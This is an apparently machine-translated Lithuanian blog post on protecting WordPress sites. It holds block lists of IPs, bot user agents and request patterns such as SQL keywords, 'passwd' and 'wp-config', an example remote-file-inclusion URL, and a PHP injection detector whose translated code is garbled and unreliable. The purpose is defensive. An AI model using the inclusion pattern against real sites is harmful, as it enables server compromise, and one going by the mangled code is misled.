About the blog ..

The Internet - my bread. That's what blog: how to make money online and how to become a better web conquerors and related subjects - SEO, Internet advertising, efficiency, productivity, and a variety of cute stuff to help your work more efficiently.

And me ...

This is a blog of someone who receives 100% of the income from the Internet. If you know more or newer things, feel free to comment.

It is necessary to blog and web security

You probably know that in many cases, web pages or blogs attempt to hack, mess up, contaminate many meaningless anonymous comments automatically, using some scripts. Of course quite often applies to manual mode. You have no idea what a pretty impressive number. Abies cases, one method of defense really is - check requests, and other IP parameters sent to the evildoer, and to block them. Just use my proposed methods, not only to defend themselves, but also to discover how far and how often you are attacking. More ...


Protection Blog

Although the directory provides a "manual" way of using Wordpress is a special protection that allows for a safer and cleaner site - TimesToCome Security Plugin . After you install this plugin will add safety parameters. Personally, I use the following IP blocked, the user agent and inquiries - part of the reason, as you caught the show here (you can also use your records). And even though you can see even in Firefox, Internet Explorer - it is often called bots.

Warning. Nepriisiimu any responsibility for provided here blocked the IP, User Agent, queries, leave every visitor to decide whether any record is appropriate.

Blocked IP:
(This is your ip banished list :)
Blocked User Agents
(This is your agent banished list)
Blocked requests
(This is your request blacklist)

12.192.82.221
121.151.44.115
121.209.51.58
122133106125
123.224.54.112
124.59.113.24
125.141.64.124
128.163.2.43
131.220.64.240
137.48.217.20
142165135180
150.187.25.20
151.13.233.147
158.109.36.140
160.99.12.231
189104241248
190.183.61.18
190.196.2.205
190.196.5.189
193171110146
193.207.106.54
193.253.223.90
193.41.90.11
193.64.244.176
194.165.49.171
194219192251
194.244.39.57
195234106106
195.47.9.2
200.203.121.1
200.49.155.60
201.8.240.141
201.9.129.198
202.47.4.161
203.88.114.169
208.116.39.133
209.12.244.192
209.172.33.53
209195110123
209216249151
209.240.239.2
211.45.156.100
212.34.184.239
212.85.146.235
213.203.223.25
213.91.210.194
216.206.238.35
216.246.228.87
216.82.211.137
217198149178
217.64.177.199
218.186.13.3
218.234.19.139
219104211129
220.86.116.174
221.153.3.136
222.122.179.42
222.164.209.65
222.96.185.28
24.109.59.229
24.200.137.142 124.179.227.139
24.66.10.194
38.117.65.239
58.177.86.197
59.11.15.187 91.121.87.84
60.52.22.176
61.47.10.168
62.103.159.31
62128242180
62193211155
62.75.185.209
62.80.243.201
63.247.43.250
64.15.155.201
64185237191
64.21.98.196
64.246.187.54
65.254.54.218
65.254.63.210
65.95.110.16
65.95.153.184
65.98.67.106
66.135.41.76
66.98.244.93
67.15.48.60
67.18.29.218
67.202.60.246
67.219.69.45
67.68.20.251
67.70.127.164
67.71.176.187
68.147.159.38
69.128.204.74
69.14.152.152
69.157.22.63
69.159.63.161
69.94.120.198
70.85.201.66
70.86.30.82
70.87.240.50
71.101.46.11
71121104178
71.43.15.172
72.233.69.58
72.29.77.72
72.49.255.51
72.55.131.17
72.69.137.26
74.210.176.55
74.6.17.188
75125143162
76.66.125.33
76.68.22.147
76.71.160.65
77189155254
77203192230
78.111.68.37
78.130.75.90
78164157213
78.42.74.174
79133236143
79.136.97.34
79.66.133.114
79.76.213.251
80.146.78.213
80.218.173.93
80233176183
80.53.133.106
81.2.200.22
82.194.67.123
82.225.55.136
82.37.19.52
82.98.141.70
83.160.222.29
83.17.224.250
83240164232
83.65.47.4
83.81.61.72
84.165.87.140
84.72.120.152
85114140133
85157139109
85.171.82.87
85192189233
85.235.40.30
85.25.10.95
85.96.215.53
86.1.196.79
86109167160
86.109.96.134
86145194229
87.101.4.49
87106222144
87.234.201.76
87.61.174.29
88.119.99.10
88.214.192.29
88.223.50.146
88.244.162.64
88.252.145.65
88252149114
89.111.173.68
89.42.133.2
91121204165
91.186.11.35
91.84.19.133
91.89.198.178
92.233.76.213
92.4.112.196 64233183. * 61.103.33.48
92.61.36.98
96.247.65.124

AnotherBot
botpaidtoclick
Click Bot
cr4nk
PR 5.3
DataCha0s
discobot
EBM-APPLE
EmailSearch
EmailSiphon
FAST ESP Document Retriever
Firefox 2.0
Ginxbot
GrubNG
gvfs
HTTrack
Incutio
Indy Library
Internet Explorer
Internet Ninja
Java
JetBrains
libcurl
libwww-perl
LWP-request
LWP-trivial
Macintosh; I; PPC
Microsoft Data Access
MJ12bot
Morpheus Fucking Scanner
Mozilla Firefox 5.0
Mozilla/4.0 (compatible
Mozilla/4.08
Mozilla/4.61 (Macintosh
Mozilla/5/0 (compatible
Mozilla/7.0
Mozilla / 8
Mozilla / Firefox
Mp3Bot
MSIE6
NIPGCrawler
PEAR
PECL
PHPot
Discover Protocol Provider
PuxaRapido
Pycurl
Python-urllib
While Security
Site Sniper
SkyGrid
Sogou
sun4m
Sunrise
syncrisis
topicblogs
User-Agent
W3CRobot
W: PACBHO60
Web :: Scraper
WebDav
WebRipper
Wget
window.location
Winnie Poh
www.ranks.nl
X12R1
Xerka-bot

$ _GET
(Java | vb)
. Gif?
. Jpg?
. Txt?
. Xml?
</ Script>
<SCRIPT>
? Page_id = http% 3A% 2F% 2F
admin-ajax.php?
admin-function.php?
ASCII
board.php? see ftp =
CAST
com_jd-wp
CONCAT
DECLARE
DELETE
formmail
includedir =
index.php? template =
INSERT
LWP-trivial
OPTIONS
passwd
PATH =
POST / xmlrpc.php
PROPFIND
register + + + +
SELECT
sidebar.php?
UNION
UPDATE
Word-tube-button.php?
wp-config
wp-login.php? action = http% 3A% 2F% 2F
wp-table-button.php?
WP-trackback.php?
x-aaaaaaaaa

What is the query and why they need to block? Let's say your site is a loophole or just assumed the offensive papuolėte horizon (but often just by attacking offensive queries in a row).

Suppose a file sidebar.php unsafe spent the query variable VARIABLE sidebar.php? VARIABLE = http://www.kompiuteriszombis.com/botas.txt, your server will be executed botas.txt script, and you can say, in most cases, your server is already hacked.

Site Security.

If you have a website, you can use this script, you need to save to your index.php, and change nemapirškite email@email.com in your email. e-mail

/ ******************************* ANTIHACK START **************** ************** /

/ / Check injection
$ Req = $ _SERVER ['REQUEST_URI'];
$ Cadena = explode ("?", $ Req);
$ = $ Mi_url Cadena [0];
$ = $ Cadena restaurants [1];

/ / Here you can put your suspicions chains at your will. Just be careful of
/ / Coincidences not ask your URL's with variables and parameters
$ Inyecc = '/ script | http | <|> |% 3c |% 3e | SELECT | UNION | UPDATE | exe | exec | INSERT | tmp / i';

/ / Detecting
if (preg_match ($ inyecc, $ resto) &&! $ _REQUEST ['FullURL']) {

/ / Make something, in example send an e-mail alert to administrator
/ / $ Ip = $ HTTP_SERVER_VARS ["HTTP_CLIENT_IP"];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
Forwarded $ = $ HTTP_SERVER_VARS ['HTTP_X_FORWARDED_FOR'];
$ = $ Remoteaddress HTTP_SERVER_VARS ["REMOTE_ADDR"];

$ Message = "injection attack in mi_url $ \ n \ nchain: $ resto \ n \ n
From: (IP-forwa-RA): - $ ip - $ Forwarded - $ remoteaddress \ n \ n
--- End ------- ";
Email ( email@email.com , "Injection Attack", $ message,
"From:" info @ {$ _SERVER ['SERVER_NAME']} ","-fwebmaster @ {$ _SERVER ['SERVER_NAME']} ");

# # # # Uzbaninam too. Htaccess
$ Fh = fopen ('. Htaccess', 'a') or die ("Could not open file.");
$ Towrite = "\ n # $ remoteaddress - $ Rest";
$ Towrite. = "\ Ndeny from $ ip \ n";
fwrite ($ fh, $ towrite);

fclose ($ fh);

# # # #

/ / Kill the message and execution
echo 'illegal url';
die ();
}
/ ******************************* ANTIHACK END **************** ************** /

One comment that "There is a blog and Web Protection

  1. Sergey 'ZaZa' Kuraki wrote:

    For such a long time ago dalikams Apache mod_security is created - I do not need to reinvent the wheel.

    As for preg'o - was not mentioned in "ftp" protocol "Delete SQL query. Also examined not only query, but variable names - so before using this code, each must consider it significant that the use

    Beja, SQL injection can be done and over to the left of the "?" Eančia address.

    If the system code is crooked - just GET request will not be enough protection, need to filter the posts and Cookies.

    It would be much more pleasant to see the Lithuanian code comments everywhere, not just in some places.

    Well, the certificates for the. Htaccess file - not the safest occupation. Of course, everything depends on the host system.

Leave your comment

Subscribe to RSS Work Online Mobile Payments by Fortumo
  • CATEGORIES

  • NEWS

    Commented

    NEW COMMENTS

    MY PARTNERS

  • Briefly

    • Business fight

      Here is yet another public fight: some do not know anyone read before balsas.lt MIKUCKI Manto . By the way, walking through the cafeteria at no cost divided by the newspapers, in my opinion, to make the paper hats, under repair tile floor apartment where the unfortunate film, the mass production of Mardi Gras masks and kill, when he saw one of them, basas.lt weekend seems to cover just neapspjoviau - such courage journa subjectivity be jealous! Mantas, we are with you. Strengths you.

    • Another global spam filter

      If you want to not only filter out spam, but also to announce that it is spam is not a global service - bohuno.com that all user data structuring, while other users have the mail is marked spam. Works with a variety of systems, and most email clients.

    • Excellent CSS compression

      You can always compress your CSS failiuką with this great tool . The truth, however, make a copy before - although compressed to 20%, a very large file may make some mistakes.

    • Another spammers?

      In the whole gang of Lithuanian begėdžių spammers, soften the laws of Lithuania, and there is another - Cinamon . It would not be angry if you read emails and make out ...

    • Has your site been hacked?

      Recently one of his derelict site, I discovered the hacker links that appear only on Google and Yahoo search bots. Want to check whether your website is the source? Type into Google: site: viagra jusutinklapis.lt :)

    • Not a good IE6

      The fact, how bad IE6, shows the excellent CSS selectors, attributes, pseudo classes palygjimas .

    • Another promotion to buy online

      In addition to offering to buy cheaper , appeared offering to buy online . This is another e-mail. store, it seems very much connected with Acme - at least so many thought after seeing the bottom of the site's keywords. It is good and offers payment through Paypal. Who will try first?

    • Google Notebook users, Evernote is waiting for you

      Dear Google Notebook user, you probably know that Google terminates Google Notebook support. Online comments excellent online storage services and programs put in place a combination of Evernote, a tool allowing suimportuoti all messages to Evernote.

  • Translator

    Lithuanian flagItalian flagKorean flagChinese (Simplified) flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flag
    By N2H